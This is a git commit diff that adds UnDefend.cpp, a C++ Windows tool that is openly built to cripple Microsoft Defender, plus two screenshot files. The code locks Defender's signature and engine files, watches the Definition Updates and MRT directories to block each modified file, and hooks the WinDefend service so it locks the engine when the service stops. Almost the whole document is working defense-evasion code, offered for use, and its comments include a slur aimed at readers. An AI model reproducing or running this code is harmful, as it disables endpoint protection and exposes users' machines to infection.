Add files via upload

2026-05-26 11:50:50 +00:00 · 2026-04-13 00:58:38 +02:00 · 2026-04-13 00:58:38 +02:00 · 0a7ecc2677
commit 0a7ecc2677
parent 4049b96f0e
3 changed files with 452 additions and 0 deletions
--- a/EngineUnavailable.png
+++ b/EngineUnavailable.png
--- a/UnDefend.cpp
+++ b/UnDefend.cpp
@ -0,0 +1,452 @@
+#define _CRT_SECURE_NO_WARNINGS
+#include <Windows.h>
+#include <stdio.h>
+#include <winternl.h>
+#include <ntstatus.h>
+#include <conio.h>
+#include <objbase.h>
+#pragma comment(lib,"ntdll.lib")
+
+HANDLE* gHandleTracker = NULL;
+CRITICAL_SECTION* gHandleTrackerLock;
+
+wchar_t gbackupfile1[MAX_PATH] = { 0 };
+wchar_t gbackupfile2[MAX_PATH] = { 0 };
+
+struct UpdThreadObj {
+
+	wchar_t* wdupdatedir;
+	wchar_t* target;
+
+};
+
+void AddHandle(HANDLE hlock)
+{
+	// shit code but works i guess
+	static unsigned int handlecount = 0;
+	EnterCriticalSection(gHandleTrackerLock);
+	HANDLE* ntracker = (HANDLE*)malloc((++handlecount + 1) * sizeof(HANDLE));
+	if (gHandleTracker)
+	{
+		memmove(ntracker, gHandleTracker, handlecount * sizeof(HANDLE));
+	} 
+	ntracker[handlecount - 1] = hlock;
+	ntracker[handlecount] = NULL;
+	if (gHandleTracker)
+		free(gHandleTracker);
+	gHandleTracker = ntracker;
+	LeaveCriticalSection(gHandleTrackerLock);
+}
+
+void TryLockBackup() {
+
+	static HANDLE hlock1 = NULL;
+	static HANDLE hlock2 = NULL;
+	if (hlock1 && hlock2)
+		return;
+	UNICODE_STRING unistr = { 0 };
+	OBJECT_ATTRIBUTES objattr = { 0 };
+	RtlInitUnicodeString(&unistr, gbackupfile1);
+	InitializeObjectAttributes(&objattr, &unistr, OBJ_CASE_INSENSITIVE, NULL, NULL);
+	IO_STATUS_BLOCK iostat = { 0 };
+
+	NTSTATUS ntstat = STATUS_SUCCESS;
+	if (!hlock1)
+		ntstat = NtCreateFile(&hlock1, GENERIC_READ | SYNCHRONIZE | GENERIC_EXECUTE, &objattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, NULL, FILE_OPEN, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_ALERT, NULL, NULL);
+
+	RtlInitUnicodeString(&unistr, gbackupfile2);
+	if (!hlock2)
+		ntstat = NtCreateFile(&hlock2, GENERIC_READ | SYNCHRONIZE | GENERIC_EXECUTE, &objattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, NULL, FILE_OPEN, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_ALERT, NULL, NULL);
+	LARGE_INTEGER li2 = { 0 };
+	if (hlock1) {
+		LARGE_INTEGER li = { 0 };
+		GetFileSizeEx(hlock1, &li);
+		OVERLAPPED ov = { 0 };
+		LockFileEx(hlock1, LOCKFILE_EXCLUSIVE_LOCK, NULL, li.LowPart, li.HighPart, &ov);
+		printf("File \"%ws\" was locked.\n", &gbackupfile2[4]);
+		AddHandle(hlock1);
+	}
+	if (hlock2)
+	{
+		LARGE_INTEGER li = { 0 };
+		GetFileSizeEx(hlock2, &li);
+		OVERLAPPED ov = { 0 };
+		LockFileEx(hlock2, LOCKFILE_EXCLUSIVE_LOCK, NULL, li.LowPart, li.HighPart, &ov);
+		printf("File \"%ws\" was locked.\n", &gbackupfile2[4]);
+		AddHandle(hlock2);
+
+	}
+	return;
+}
+
+
+DWORD WINAPI UpdateBlockerThread(UpdThreadObj* argv)
+{
+	wchar_t fpath[MAX_PATH] = { 0 };
+	wchar_t _fpath[MAX_PATH] = { 0 };
+	wcscpy(fpath, argv->wdupdatedir);
+	wcscat(fpath, L"\\");
+	wcscat(fpath, argv->target);
+	free(argv->target);
+	delete argv;
+	DWORD index = 0;
+
+	HANDLE hlock = NULL;
+	UNICODE_STRING target = { 0 };
+	OBJECT_ATTRIBUTES objattr = { 0 };
+	CLSID tmp = { 0 };
+	NTSTATUS stat = STATUS_SUCCESS;
+	IO_STATUS_BLOCK iostat = { 0 };
+	wchar_t mx[40] = { 0 };
+	/*
+	for (int i = wcslen(fpath); i > 0; i--) {
+
+		if (fpath[i] == L'\\')
+		{
+			if (wcslen(fpath) > 99)
+			{
+				memmove(mx, &fpath[i - 38], 38 * sizeof(wchar_t));
+				break;
+			}
+			else if (wcslen(fpath) > 67)
+			{
+				memmove(mx, &fpath[i - 6], 6 * sizeof(wchar_t));
+				break;
+			}
+			
+			break;
+		}
+	}
+	wchar_t __cmp[7] = { 0 };
+	memmove(__cmp, mx, 6 * sizeof(wchar_t));*/
+	if (1/*(!CLSIDFromString(mx, &tmp)) || _wcsicmp(__cmp, L"Backup") == 0*/)
+	{
+		printf("Found path : \"%ws\"\n", fpath);
+		wcscpy(_fpath, L"\\??\\");
+		wcscat(_fpath, fpath);
+		RtlInitUnicodeString(&target, _fpath);
+		InitializeObjectAttributes(&objattr, &target, OBJ_CASE_INSENSITIVE, NULL, NULL);
+		IO_STATUS_BLOCK iostat = { 0 };
+
+		do {
+			stat = NtCreateFile(&hlock, GENERIC_READ | SYNCHRONIZE, &objattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, FILE_NON_DIRECTORY_FILE, NULL, NULL);
+			if (stat == STATUS_NOT_FOUND || stat == STATUS_OBJECT_NAME_NOT_FOUND || stat == STATUS_OBJECT_PATH_NOT_FOUND)
+				return stat;
+		} while (stat);
+		LARGE_INTEGER li = { 0 };
+		GetFileSizeEx(hlock, &li);
+		LARGE_INTEGER offset = { 0,0 };
+
+		if (!LockFile(hlock, offset.LowPart, offset.HighPart, li.LowPart, li.HighPart))
+		{
+			printf("LockFile failed, error : %d\n", GetLastError());
+		}
+		printf("File \"%ws\" was locked.\n", fpath);
+		
+		AddHandle(hlock);
+	}
+	
+	return ERROR_SUCCESS;
+}
+
+
+VOID WDKillerCallback(IN PVOID pParameter)
+{
+
+	printf("Windows defender stopped...\n");
+	PSERVICE_NOTIFY psny = (PSERVICE_NOTIFY)pParameter;
+	SC_HANDLE hsvc = (SC_HANDLE)psny->pContext;
+	DWORD requiredbytes = 0;
+	QueryServiceConfig(hsvc, NULL, NULL, &requiredbytes);
+	if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)
+	{
+		printf("Failed to query windows defender service configuration, error : %d\n", GetLastError());
+		return;
+	}
+	LPQUERY_SERVICE_CONFIG svccfg = (LPQUERY_SERVICE_CONFIG)malloc(requiredbytes);
+	if (!QueryServiceConfig(hsvc, svccfg, requiredbytes, &requiredbytes))
+	{
+		printf("Failed to query windows defender service configuration, error : %d\n", GetLastError());
+		return;
+	}
+	svccfg->lpBinaryPathName[wcslen(svccfg->lpBinaryPathName) - 1] = NULL;
+	wchar_t* binpath = &svccfg->lpBinaryPathName[1];
+	/*
+	wchar_t dllpath[MAX_PATH] = { 0 };
+	memmove(dllpath, binpath, wcslen(binpath) * sizeof(wchar_t) - (11 * sizeof(wchar_t)));
+	wcscat(dllpath, L"MpSvc.dll");
+	printf("%ws\n", dllpath);
+	*/
+
+
+	HKEY wdkey = NULL;
+	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates", NULL, KEY_READ, &wdkey) || !wdkey)
+	{
+		printf("Failed to open windows defender key.\n");
+		return;
+	}
+	wchar_t sigpath[MAX_PATH] = { 0 };
+	DWORD retsz = sizeof(sigpath);
+	//TODO : Check if this returns a properly null terminated string
+	DWORD retcode = RegQueryValueEx(wdkey, L"SignatureLocation", NULL, NULL, (LPBYTE)sigpath, &retsz);
+	RegCloseKey(wdkey);
+	wdkey = NULL;
+	if (retcode)
+	{
+		printf("Failed to find windows defender signature path.\n");
+		return;
+	}
+
+	wcscat(sigpath, L"\\mpavbase.vdm");
+	wchar_t _sigpath[MAX_PATH] = { 0 };
+	wcscpy(_sigpath, L"\\??\\");
+	wcscat(_sigpath, sigpath);
+	UNICODE_STRING unistr = { 0 };
+	RtlInitUnicodeString(&unistr, _sigpath);
+	OBJECT_ATTRIBUTES objattr = { 0 };
+	InitializeObjectAttributes(&objattr, &unistr, OBJ_CASE_INSENSITIVE, NULL, NULL);
+	IO_STATUS_BLOCK iostat = { 0 };
+	// if you are reading this, you are autistic.
+	HANDLE hlock = NULL;
+	NTSTATUS ntstat = STATUS_SUCCESS;
+	ntstat = NtCreateFile(&hlock, GENERIC_READ | SYNCHRONIZE | GENERIC_EXECUTE, &objattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL, NULL, FILE_OPEN, FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_ALERT, NULL, NULL);
+	if (ntstat)
+	{
+		printf("Failed to open engine file \"%ws\", error : 0x%0.8X\n", unistr.Buffer, ntstat);
+		return;
+	}
+	LARGE_INTEGER li = { 0 };
+	LARGE_INTEGER li2 = { 0 };
+	GetFileSizeEx(hlock, &li);
+	OVERLAPPED ov = { 0 };
+	LockFileEx(hlock, LOCKFILE_EXCLUSIVE_LOCK, NULL, li.LowPart, li.HighPart, &ov);
+
+	printf("File locked.\n");
+	free(svccfg);
+	AddHandle(hlock);
+	return;
+}
+
+
+DWORD WINAPI WDKillerThread(void*)
+{
+	SC_HANDLE hsvc = NULL;
+	SC_HANDLE scmgr = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
+	if (!scmgr)
+	{
+		printf("Failed to open service manager, error : %d\n", GetLastError());
+		return 1;
+	}
+	hsvc = OpenService(scmgr, L"WinDefend", SERVICE_QUERY_STATUS | SERVICE_QUERY_CONFIG);
+	CloseServiceHandle(scmgr);
+	if (!hsvc)
+	{
+		printf("Failed to open WinDefend service, error : %d\n", GetLastError());
+		return 1;
+	}
+
+	SERVICE_STATUS svcstat = { 0 };
+	if (!QueryServiceStatus(hsvc, &svcstat) || svcstat.dwCurrentState != SERVICE_RUNNING)
+	{
+		printf("Windows Defender isn't running, exiting...");
+		CloseHandle(hsvc);
+		ExitProcess(ERROR_SUCCESS);
+	}
+	while (1) {
+		SERVICE_NOTIFY_2W svcnotify = { 0 };
+		svcnotify.dwVersion = SERVICE_NOTIFY_STATUS_CHANGE;
+		svcnotify.pfnNotifyCallback = WDKillerCallback;
+		svcnotify.pContext = hsvc;
+		if (NotifyServiceStatusChangeW(hsvc,
+			SERVICE_NOTIFY_STOPPED, &svcnotify))
+		{
+			printf("Failed to set a notification for windows defender status.\n");
+			CloseHandle(hsvc);
+			return 1;
+		}
+		printf("Registered callback for Windows Defender status change.\n");
+		SleepEx(INFINITE, TRUE);
+	}
+	CloseHandle(hsvc);
+	return 0;
+
+}
+
+DWORD WINAPI MRTWorkerThread(void*) {
+
+	wchar_t wdpath[MAX_PATH] = { 0 };
+	wchar_t _wdupdatedir[] = { L"\\??\\C:\\Windows\\System32\\MRT"};
+	UNICODE_STRING target = { 0 };
+	RtlInitUnicodeString(&target, _wdupdatedir);
+	OBJECT_ATTRIBUTES objattr = { 0 };
+	IO_STATUS_BLOCK iostat = { 0 };
+	HANDLE hmonitordir = NULL;
+	DWORD retbytes = 0;
+
+	InitializeObjectAttributes(&objattr, &target, OBJ_CASE_INSENSITIVE, NULL, NULL);
+	NTSTATUS stat = STATUS_SUCCESS; 
+	do {
+		Sleep(10);
+		stat = NtCreateFile(&hmonitordir, FILE_READ_DATA | SYNCHRONIZE, &objattr, &iostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+			FILE_OPEN, FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT | FILE_OPEN_REPARSE_POINT, NULL, NULL);
+
+	} while (stat == STATUS_OBJECT_NAME_NOT_FOUND);
+	if (stat || !hmonitordir)
+	{
+		printf("Failed to open MRT directory, error : 0x%0.8X\n",stat);
+		return 1;
+	}
+	char notifydata[0x1000] = { 0 };
+	do {
+
+		if (!ReadDirectoryChangesW(hmonitordir, notifydata, sizeof(notifydata), TRUE, FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL))
+		{
+
+			printf("Failed to set directory watcher.\n");
+			return 1;
+		}
+
+
+		FILE_NOTIFY_INFORMATION* fni = (FILE_NOTIFY_INFORMATION*)notifydata;
+		if (fni->Action != FILE_ACTION_MODIFIED)
+			continue;
+
+		//printf("Notify triggered.\n");
+
+		UpdThreadObj* threadargv = new UpdThreadObj;
+		threadargv->wdupdatedir = &_wdupdatedir[4];
+		fni->FileName[fni->FileNameLength * sizeof(wchar_t) + sizeof(wchar_t)] = NULL;
+		wchar_t* target = (wchar_t*)malloc(fni->FileNameLength * sizeof(wchar_t) + sizeof(wchar_t));
+		ZeroMemory(target, sizeof(fni->FileNameLength * sizeof(wchar_t) + sizeof(wchar_t)));
+		wcscpy(target, fni->FileName);
+		threadargv->target = target;
+		DWORD tid = 0;
+		// TODO : track thread creation
+		HANDLE hthread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)UpdateBlockerThread, threadargv, NULL, &tid);
+
+	} while (1);
+	return ERROR_SUCCESS;
+}
+
+int wmain()
+{
+	DWORD tid2 = 0;
+
+
+	wchar_t updatedir[MAX_PATH] = { 0 };
+	HKEY wdkey = NULL;
+	wchar_t wdpath[MAX_PATH] = { 0 };
+	wchar_t wdupdatedir[MAX_PATH] = { 0 };
+	wchar_t _wdupdatedir[MAX_PATH] = { 0 };
+	DWORD retsz = sizeof(wdpath);
+	DWORD retbytes = 0;
+	DWORD retcode = 0;
+	HANDLE hmonitordir = NULL;
+	NTSTATUS stat = STATUS_SUCCESS;
+	UNICODE_STRING target = { 0 };
+	OBJECT_ATTRIBUTES objattr = { 0 };
+	IO_STATUS_BLOCK iostat = { 0 };
+	gHandleTrackerLock = new CRITICAL_SECTION;
+	InitializeCriticalSection(gHandleTrackerLock);
+
+
+	HANDLE wdkiller = NULL;
+
+
+
+	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender", NULL, KEY_READ, &wdkey) || !wdkey)
+	{
+		printf("Failed to open windows defender key.\n");
+		return 1;
+	}
+
+	//TODO : Check if this returns a properly null terminated string
+	retcode = RegQueryValueEx(wdkey, L"ProductAppDataPath", NULL, NULL, (LPBYTE)wdpath, &retsz);
+	RegCloseKey(wdkey);
+	wdkey = NULL;
+	if (retcode)
+	{
+		printf("Failed to find windows defender installation path.\n");
+		return 1;
+	}
+
+	wcscpy(wdupdatedir, wdpath);
+	wcscat(wdupdatedir, L"\\Definition Updates");
+
+	wcscpy(_wdupdatedir, L"\\??\\");
+	wcscat(_wdupdatedir, wdupdatedir);
+
+	wcscpy(gbackupfile1, _wdupdatedir);
+	wcscpy(gbackupfile2, _wdupdatedir);
+	wcscat(gbackupfile1, L"\\Backup\\mpavbase.lkg");
+	wcscat(gbackupfile2, L"\\Backup\\mpavbase.vdm");
+
+	TryLockBackup();
+
+	wdkiller = CreateThread(NULL, NULL, WDKillerThread, NULL, NULL, &tid2);
+
+	// run in killer mode
+	// WaitForSingleObject(wdkiller,INFINITE);
+	// 
+
+	HANDLE mrtkiller = CreateThread(NULL, NULL, MRTWorkerThread, NULL, NULL, &tid2);
+	if (!wdkiller)
+	{
+		printf("Failed to create defender killer thread.\n");
+	}
+	if (!mrtkiller)
+	{
+		printf("Failed to create MRT killer thread.\n");
+	}
+
+	RtlInitUnicodeString(&target, _wdupdatedir);
+	InitializeObjectAttributes(&objattr, &target, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+	stat = NtCreateFile(&hmonitordir, FILE_READ_DATA | SYNCHRONIZE, &objattr, &iostat, NULL, NULL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+		FILE_OPEN, FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT | FILE_OPEN_REPARSE_POINT, NULL, NULL);
+	if (stat || !hmonitordir)
+	{
+		printf("Failed to open windows defender update directory.\n");
+		return 1;
+	}
+
+	
+
+	//WaitForSingleObject(gevent, INFINITE);
+	char notifydata[0x1000] = { 0 };
+	do {
+
+		if (!ReadDirectoryChangesW(hmonitordir, notifydata, sizeof(notifydata), TRUE, FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL))
+		{
+
+			printf("Failed to set directory watcher.\n");
+			return 1;
+		}
+
+
+		FILE_NOTIFY_INFORMATION* fni = (FILE_NOTIFY_INFORMATION*)notifydata;
+		if (fni->Action != FILE_ACTION_MODIFIED)
+			continue;
+
+		//printf("Notify triggered.\n");
+		
+		UpdThreadObj* threadargv = new UpdThreadObj;
+		threadargv->wdupdatedir = wdupdatedir;
+		fni->FileName[fni->FileNameLength * sizeof(wchar_t) + sizeof(wchar_t)] = NULL;
+		wchar_t* target = (wchar_t*)malloc(fni->FileNameLength * sizeof(wchar_t) + sizeof(wchar_t));
+		ZeroMemory(target, sizeof(fni->FileNameLength * sizeof(wchar_t) + sizeof(wchar_t)));
+		wcscpy(target, fni->FileName);
+		threadargv->target = target;
+		DWORD tid = 0;
+		// TODO : track thread creation
+		HANDLE hthread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)UpdateBlockerThread, threadargv, NULL, &tid);
+
+
+	} while (1);
+
+
+	CloseHandle(hmonitordir);
+
+
+	return 0;
+}
--- a/UpdateError.png
+++ b/UpdateError.png